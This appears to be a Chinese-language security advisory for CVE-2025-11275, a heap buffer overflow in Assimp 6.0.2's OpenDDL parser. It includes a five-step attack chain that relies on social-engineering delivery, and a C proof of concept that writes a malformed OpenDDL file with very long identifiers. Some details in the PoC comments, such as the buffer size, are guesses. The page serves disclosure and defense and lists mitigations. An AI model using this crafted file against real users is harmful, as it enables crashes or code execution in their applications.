CVE-2025-11275：Assimp 6.0.2 OpenDDL解析器堆缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11275

漏洞类型

堆缓冲区溢出（Heap-based Buffer Overflow）

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open Asset Import Library (Assimp)

漏洞概述

CVE-2025-11275是Open Asset Import Library（Assimp）6.0.2版本中存在的一个堆缓冲区溢出漏洞。该漏洞位于Assimp所集成的OpenDDL解析器模块中，具体涉及ODDLParser::getNextSeparator函数，该函数定义于assimp/contrib/openddlparser/include/openddlparser/OpenDDLParserUtils.h文件中。Assimp是一个广泛使用的开源3D模型导入库，支持多种3D文件格式（如OBJ、FBX、GLTF、Collada等），被大量游戏引擎、3D建模工具和图形应用程序所采用。

该漏洞的根本原因在于OpenDDL解析器在处理特定格式的OpenDDL文件时，getNextSeparator函数未能对输入数据进行有效的边界检查，导致在解析过程中发生堆缓冲区溢出。攻击者可以通过精心构造恶意的OpenDDL格式文件，触发该漏洞并实现对受影响应用程序的控制。由于Assimp通常作为第三方库被集成到各种应用程序中，该漏洞的影响范围可能波及所有使用Assimp 6.0.2版本处理用户提供的3D模型文件的应用程序。

根据CVSS 3.1评分体系，该漏洞获得5.3分（MEDIUM级别）。攻击向量为本地（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。成功利用该漏洞可导致机密性、完整性和可用性均受到低程度影响。值得注意的是，该漏洞的PoC（概念验证代码）已经在GitHub上公开发布，任何潜在的攻击者都可以获取并利用，增加了该漏洞被实际利用的风险。

技术细节

该漏洞的技术原理在于Assimp 6.0.2中集成的OpenDDL解析器（OpenDDLParser）在解析OpenDDL格式文件时，ODDLParser::getNextSeparator函数存在缓冲区边界检查缺陷。当解析器遍历输入文件内容以查找分隔符时，如果遇到特制的超长标识符或畸形的数据结构，函数会向预分配的堆缓冲区写入超出其容量的数据，从而触发堆缓冲区溢出。

具体而言，getNextSeparator函数负责在OpenDDL文本流中定位下一个语法分隔符（如换行符、括号等）。在正常情况下，该函数应当对缓冲区大小进行限制，但由于缺少适当的长度验证逻辑，恶意构造的输入可以导致函数持续写入数据直至超出堆缓冲区边界。攻击者可以通过提供一个精心制作的OpenDDL格式文件（例如包含超长标识符或嵌套结构），在受害应用程序打开或导入该文件时触发溢出。

利用方式方面，攻击者首先需要制作一个恶意的3D模型文件（OpenDDL格式），然后通过社会工程学或其他手段诱导受害者使用集成了Assimp 6.0.2的应用程序打开该文件。一旦文件被解析，堆缓冲区溢出将被触发，攻击者可能实现任意代码执行、进程崩溃或内存信息泄露等攻击效果。由于该漏洞为本地攻击，攻击者需要能够将恶意文件投递到目标系统上。

攻击链分析

STEP 1

步骤1：制作恶意OpenDDL文件

攻击者创建一个精心构造的OpenDDL格式3D模型文件，其中包含超长标识符或畸形的数据结构，用于触发ODDLParser::getNextSeparator函数中的堆缓冲区溢出。

STEP 2

步骤2：投递恶意文件

攻击者通过电子邮件、文件共享平台、恶意网站下载或其他社会工程学手段，将恶意OpenDDL文件投递到目标系统上。由于攻击向量为本地，攻击者需要将文件放置在目标系统可访问的位置。

STEP 3

步骤3：触发文件解析

受害者使用集成了Assimp 6.0.2版本的应用程序（如3D建模工具、游戏引擎或图形处理软件）打开或导入该恶意文件，触发Assimp库对OpenDDL格式的解析过程。

STEP 4

步骤4：触发堆缓冲区溢出

在解析过程中，ODDLParser::getNextSeparator函数处理超长标识符时，由于缺少边界检查，将超出预分配堆缓冲区容量的数据写入内存，触发堆缓冲区溢出。

STEP 5

步骤5：利用溢出执行攻击

攻击者利用堆缓冲区溢出实现任意代码执行、进程崩溃或内存破坏。由于该漏洞可影响机密性、完整性和可用性，攻击者可能获取敏感信息或完全控制受影响应用程序。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-11275 PoC - Assimp 6.0.2 OpenDDL Parser Heap Buffer Overflow
// Triggered via ODDLParser::getNextSeparator in OpenDDLParserUtils.h
// This PoC creates a malformed OpenDDL file with an excessively long identifier
// to trigger heap-based buffer overflow in the getNextSeparator function.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    // OpenDDL format: structure with a very long identifier name
    // The getNextSeparator function fails to validate buffer boundaries
    // when processing extremely long tokens, causing heap overflow.
    const char *filename = "poc.openddl";
    FILE *fp = fopen(filename, "w");
    if (!fp) {
        perror("fopen");
        return 1;
    }

    // Write OpenDDL header
    fprintf(fp, "OpenDDL Resource Script\n");

    // Create a structure block with an overly long identifier
    // This triggers the buffer overflow in getNextSeparator()
    // when the parser tries to locate the next separator after
    // the identifier token.
    fprintf(fp, "Structure $");

    // Write a very long identifier (exceeds internal buffer size)
    // The default internal buffer in OpenDDLParser is typically 256 bytes
    int identifier_len = 8192;  // Significantly larger than internal buffer
    for (int i = 0; i < identifier_len; i++) {
        fputc('A', fp);
    }
    fprintf(fp, " {\n");

    // Add nested content to increase parsing complexity
    fprintf(fp, "  FloatArray $");
    for (int i = 0; i < 4096; i++) {
        fputc('B', fp);
    }
    fprintf(fp, " [ ");
    for (int i = 0; i < 1000; i++) {
        fprintf(fp, "1.0 ");
    }
    fprintf(fp, "]\n");

    // Close the structure
    fprintf(fp, "}\n");

    fclose(fp);
    printf("PoC file '%s' generated successfully.\n", filename);
    printf("Open this file with any application using Assimp 6.0.2 to trigger\n");
    printf("heap-based buffer overflow in ODDLParser::getNextSeparator().\n");

    return 0;
}

影响范围

Open Asset Import Library (Assimp) 6.0.2

防御指南

临时缓解措施

在无法立即升级Assimp库的情况下，建议采取以下临时缓解措施：1）在应用程序层面增加文件格式白名单机制，限制只处理可信来源的3D模型文件；2）在解析OpenDDL文件之前，对文件大小和内容进行预检查，拒绝异常大的文件或包含可疑模式的文件；3）使用操作系统级别的安全机制（如DEP、ASLR）减轻缓冲区溢出的影响；4）将Assimp库的解析操作隔离在沙箱环境中执行，限制潜在攻击的影响范围；5）监控相关安全公告，及时应用官方发布的补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11275
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11275
3 Details https://www.cvedetails.com/cve/CVE-2025-11275/
4 VulDB https://vuldb.com/cve/CVE-2025-11275
5 Link https://github.com/assimp/assimp/issues/6357
6 Link https://github.com/user-attachments/files/22417682/poc.zip
7 Link https://vuldb.com/?ctiid.327009
8 Link https://vuldb.com/?id.327009
9 Link https://vuldb.com/?submit.658675